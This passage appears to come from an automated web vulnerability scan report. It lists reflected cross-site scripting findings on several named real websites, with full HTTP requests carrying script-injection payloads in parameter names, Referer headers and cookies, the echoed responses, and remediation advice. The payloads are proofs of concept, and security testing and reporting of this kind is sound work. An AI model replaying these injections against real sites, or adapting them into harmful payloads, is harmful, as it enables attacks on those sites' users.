Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /caloriecounter.asp?a034a"><script>alert(1)</script>9c84818be=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 218657 Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:40 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7B46FD7DD2%2DCD12%2D40D7%2DA9B6%2D644CFD94BA35%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=AFKEAHHBIPABPKILPEMGKNKN; path=/ Date: Tue, 23 Nov 2010 02:45:40 GMT Connection: close
2.744. http://www.virtualmedicalcentre.com/diseases.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/diseases.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c78e"><script>alert(1)</script>28c8259f7e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /diseases.asp?6c78e"><script>alert(1)</script>28c8259f7e5=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47420 Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:29 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7B6A969D3A%2DC96B%2D4F94%2DA4A4%2DFAC490625751%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=LBKEAHHBFPKJIFIILIFKLACG; path=/ Date: Tue, 23 Nov 2010 02:45:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/diseases.asp?6c78e"><script>alert(1)</script>28c8259f7e5=1" /> ...[SNIP]...
2.745. http://www.virtualmedicalcentre.com/experiences.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/experiences.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40f82"><script>alert(1)</script>ffe1f91aac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /experiences.asp?40f82"><script>alert(1)</script>ffe1f91aac=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48384 Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:42 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7BA8BF7E0D%2D7435%2D49C0%2D919C%2DA3781AC4D0C6%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=EFKEAHHBFICMKJCCMBHDIEBM; path=/ Date: Tue, 23 Nov 2010 02:45:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/experiences.asp?40f82"><script>alert(1)</script>ffe1f91aac=1" /> ...[SNIP]...
2.746. http://www.virtualmedicalcentre.com/featuredpages.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/featuredpages.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6240f"><script>alert(1)</script>9881b10d42f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /featuredpages.asp?6240f"><script>alert(1)</script>9881b10d42f=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:39 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7BDAD53E07%2D1DAC%2D49ED%2DA8BD%2DDAC2DA602EC1%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=KEKEAHHBGFPPOBHDNLAFHAPO; path=/ Date: Tue, 23 Nov 2010 02:45:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/featuredpages.asp?6240f"><script>alert(1)</script>9881b10d42f=1" /> ...[SNIP]...
2.747. http://www.virtualmedicalcentre.com/healthandlifestyle.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/healthandlifestyle.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b487c"><script>alert(1)</script>0498d7ef857 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /healthandlifestyle.asp?b487c"><script>alert(1)</script>0498d7ef857=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 100129 Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:38 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7BE2F6BDB5%2D3144%2D47AB%2D8EE2%2D55626B780D89%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=EEKEAHHBLEMAOKEGCNBJGACI; path=/ Date: Tue, 23 Nov 2010 02:45:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/healthandlifestyle.asp?b487c"><script>alert(1)</script>0498d7ef857=1" /> ...[SNIP]...
2.748. http://www.virtualmedicalcentre.com/healthinvestigations.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/healthinvestigations.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f75a0"><script>alert(1)</script>5dba5025748 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /healthinvestigations.asp?f75a0"><script>alert(1)</script>5dba5025748=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63120 Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:44 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7B094FD228%2D1A2B%2D4A77%2DAFFD%2DC18DBB3AA5A3%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=KFKEAHHBOEPPKNGDJDPEHOAN; path=/ Date: Tue, 23 Nov 2010 02:45:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/healthinvestigations.asp?f75a0"><script>alert(1)</script>5dba5025748=1" /> ...[SNIP]...
2.749. http://www.virtualmedicalcentre.com/treatments.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/treatments.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3984b"><script>alert(1)</script>4abb88d2a3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /treatments.asp?3984b"><script>alert(1)</script>4abb88d2a3a=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 64530 Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:32 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7B1874D285%2D1400%2D49FC%2DBCFE%2D447388F02BAA%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=LCKEAHHBNGIIOLPLPLGMIFAD; path=/ Date: Tue, 23 Nov 2010 02:45:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/treatments.asp?3984b"><script>alert(1)</script>4abb88d2a3a=1" /> ...[SNIP]...
2.750. http://www.virtualmedicalcentre.com/videopage.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/videopage.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63070"><script>alert(1)</script>49ff8e0efd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videopage.asp?63070"><script>alert(1)</script>49ff8e0efd3=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:35 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7B957648FF%2D89D9%2D4B9C%2D8E66%2DC9A361C42E7A%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=MDKEAHHBGAKNCONHLMGLABAB; path=/ Date: Tue, 23 Nov 2010 02:45:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/videopage.asp?63070"><script>alert(1)</script>49ff8e0efd3=1" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7879</script><script>alert(1)</script>4b7358e3806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes/create HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music; Referer: http://www.google.com/search?hl=en&q=d7879</script><script>alert(1)</script>4b7358e3806
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 66690
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Login - BigPond Music MP3 Do ...[SNIP]... <script> LightboxFrame.onCloseFunction = function() { window.location.href = 'http://www.google.com/search?hl=en&q=d7879</script><script>alert(1)</script>4b7358e3806'; } ShowLoginPopup("/SignIn?noclose=true"); </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf219</script><script>alert(1)</script>d6ebae307dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes/favourites HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music; Referer: http://www.google.com/search?hl=en&q=cf219</script><script>alert(1)</script>d6ebae307dd
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 66698
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Login - BigPond Music MP3 Do ...[SNIP]... <script> LightboxFrame.onCloseFunction = function() { window.location.href = 'http://www.google.com/search?hl=en&q=cf219</script><script>alert(1)</script>d6ebae307dd'; } ShowLoginPopup("/SignIn?noclose=true"); </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15254</script><script>alert(1)</script>0659f0d212a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes/my HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music; Referer: http://www.google.com/search?hl=en&q=15254</script><script>alert(1)</script>0659f0d212a
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 66682
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Login - BigPond Music MP3 Do ...[SNIP]... <script> LightboxFrame.onCloseFunction = function() { window.location.href = 'http://www.google.com/search?hl=en&q=15254</script><script>alert(1)</script>0659f0d212a'; } ShowLoginPopup("/SignIn?noclose=true"); </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 366fb--><script>alert(1)</script>b8c657fe0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /accordion.htm HTTP/1.1 Host: mysite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=366fb--><script>alert(1)</script>b8c657fe0f
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 02:50:40 GMT Server: .V10 Apache Filter-Revision: 1.217 Keep-Alive: timeout=999999, max=999998 Connection: Keep-Alive Content-Type: text/html Content-Length: 13273
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed975'%3balert(1)//5516d30cc47 was submitted in the SelectedState cookie. This input was echoed as ed975';alert(1)//5516d30cc47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelecteded975'%3balert(1)//5516d30cc47;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5720f'-alert(1)-'3f6b0d7250d was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Automotive/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected5720f'-alert(1)-'3f6b0d7250d;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df62'-alert(1)-'29e12130eda was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Automotive/Caravans/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected3df62'-alert(1)-'29e12130eda;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61784'-alert(1)-'2cf26ab4301 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Automotive/Motorbikes-ATVs/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected61784'-alert(1)-'2cf26ab4301;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 802f1'-alert(1)-'57137431a55 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Automotive/Trailers/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected802f1'-alert(1)-'57137431a55;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e988'-alert(1)-'13c352eae0 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Automotive/Wheels-Tyres-Parts-Accessories/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected5e988'-alert(1)-'13c352eae0;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16887'-alert(1)-'c31d5adba42 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Boats/Browse HTTP/1.1 Host: www.tradingpost.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected16887'-alert(1)-'c31d5adba42;
The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe9e9'-alert(1)-'76139df7702 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
